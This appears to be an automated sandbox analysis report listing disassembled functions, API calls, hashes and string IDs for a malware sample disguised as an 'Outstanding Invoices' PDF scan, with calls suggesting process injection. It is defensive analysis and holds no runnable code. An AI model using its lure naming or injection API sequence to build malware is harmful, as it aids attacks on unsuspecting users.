                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 3886058894-0
                                                                              • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                              • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                              • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                              • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • _memset.LIBCMT ref: 00401C62
                                                                              • _wcsncpy.LIBCMT ref: 00401CA1
                                                                              • _wcscpy.LIBCMT ref: 00401CBD
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                              • String ID: Line:
                                                                              • API String ID: 1620655955-1585850449
                                                                              • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                              • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                              • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                              • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 627 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                              • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                              • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                              • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                              • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                              • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                                              APIs
                                                                                • Part of subcall function 02E542F0: Sleep.KERNELBASE(000001F4), ref: 02E54301
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02E54546
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2042513613.0000000002E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E52000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2e52000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: QAASN3QT63BI73DI6LOOZRV
                                                                              • API String ID: 2694422964-267715321
                                                                              • Opcode ID: e4b506179e53436cba405a8452494426fee9eb1ae35156591a3b66cc72deff3f
                                                                              • Instruction ID: 9eeee6f92dbcd8411bfcbd11035ff5abf3ef76d0aad047f53df26f01fe82efd7
                                                                              • Opcode Fuzzy Hash: e4b506179e53436cba405a8452494426fee9eb1ae35156591a3b66cc72deff3f
                                                                              • Instruction Fuzzy Hash: 1A619370D14298DBEF11DBB4C854BEEBBB5AF15304F008199E6487B2C1D7BA1B84CB66
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 00413AA6
                                                                                • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                              • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                              • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                              • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                              • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 2714421763-0
                                                                              • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                              • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                              • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                              • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _malloc
                                                                              • String ID: Default$|k
                                                                              • API String ID: 1579825452-2254895183
                                                                              • Opcode ID: 3dc1ea6b950fd729d521ffb34969a9434835f7e54b05094a067f2b923f8b70c4
                                                                              • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                              • Opcode Fuzzy Hash: 3dc1ea6b950fd729d521ffb34969a9434835f7e54b05094a067f2b923f8b70c4
                                                                              • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                              APIs
                                                                                • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                              • _strcat.LIBCMT ref: 0040F603
                                                                                • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 1194219731-2761332787
                                                                              • Opcode ID: 0d9f6e0625c9955ac739dcb2fa925a2e137e7c849d047db6db8550fb12ae32b7
                                                                              • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                              • Opcode Fuzzy Hash: 0d9f6e0625c9955ac739dcb2fa925a2e137e7c849d047db6db8550fb12ae32b7
                                                                              • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 02E53AAB
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02E53B41
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02E53B63
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2042513613.0000000002E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E52000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2e52000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                              • Instruction ID: 8063304d4622aea999926f7b9add29ef61b21a8248fb8b923a478e59ea20f948
                                                                              • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                              • Instruction Fuzzy Hash: CA621B30A64258DBEB24CFA4C851BDEB372EF58304F1091A9E50DEB390E7759E81CB59
                                                                              APIs
                                                                              • __flush.LIBCMT ref: 00414630
                                                                              • __fileno.LIBCMT ref: 00414650
                                                                              • __locking.LIBCMT ref: 00414657
                                                                              • __flsbuf.LIBCMT ref: 00414682
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                              • String ID:
                                                                              • API String ID: 3240763771-0
                                                                              • Opcode ID: c33d3fdb12fd4259bf2a599739e05a6f0e5efad5a95894a275e42edd94bab877
                                                                              • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                              • Opcode Fuzzy Hash: c33d3fdb12fd4259bf2a599739e05a6f0e5efad5a95894a275e42edd94bab877
                                                                              • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0040E202
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell__memset
                                                                              • String ID:
                                                                              • API String ID: 928536360-0
                                                                              • Opcode ID: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                              • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                              • Opcode Fuzzy Hash: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                              • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1411284514-0
                                                                              • Opcode ID: 434a09dc2ccf5acf5da9d170fb2a9150075d9e2bef7d0d316e08dab26350da05
                                                                              • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                              • Opcode Fuzzy Hash: 434a09dc2ccf5acf5da9d170fb2a9150075d9e2bef7d0d316e08dab26350da05
                                                                              • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00434FB8
                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00434FD2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$FileNamePath
                                                                              • String ID: aut
                                                                              • API String ID: 3285503233-3010740371
                                                                              • Opcode ID: 82f31d04e16af5f01be6cdfc0d9504ab1fb0bcbc6d64d3389bdd0f197d66684f
                                                                              • Instruction ID: 3313f3dae54ffcfdd9147ab58f8a32ee61f020fa86886c131b3703d02f5643f1
                                                                              • Opcode Fuzzy Hash: 82f31d04e16af5f01be6cdfc0d9504ab1fb0bcbc6d64d3389bdd0f197d66684f
                                                                              • Instruction Fuzzy Hash: 92D05EB41443006FE220EB44DC8EF7E7368AB84700F108D2DBE70810D0E2F45114C76A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                              • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                              • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                              • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                              • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                              • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                              • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,00452BC1,?,?,?), ref: 00434F7E
                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00434F98
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00434F9F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              • Opcode ID: 8160c471e296e30317256c6c88eb7e1bc07dc4386827ceea14d4f756b3bee6b9
                                                                              • Instruction ID: 225011b16fe4d6af9175c1a66afc187e3dae5687c313c29167a0b6f0749d34c1
                                                                              • Opcode Fuzzy Hash: 8160c471e296e30317256c6c88eb7e1bc07dc4386827ceea14d4f756b3bee6b9
                                                                              • Instruction Fuzzy Hash: D4E04F75240320BBE1209B249C4DF9F7768AB89B20F208A18F755661D0C7B46C418769
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00401B71
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: @EXITCODE
                                                                              • API String ID: 580348202-3436989551
                                                                              • Opcode ID: eae92ea4f59f66ed54822a668c79aba6c1b5bed3b83d1a70c8025a31f334c152
                                                                              • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                              • Opcode Fuzzy Hash: eae92ea4f59f66ed54822a668c79aba6c1b5bed3b83d1a70c8025a31f334c152
                                                                              • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __lock_file_memset
                                                                              • String ID:
                                                                              • API String ID: 26237723-0
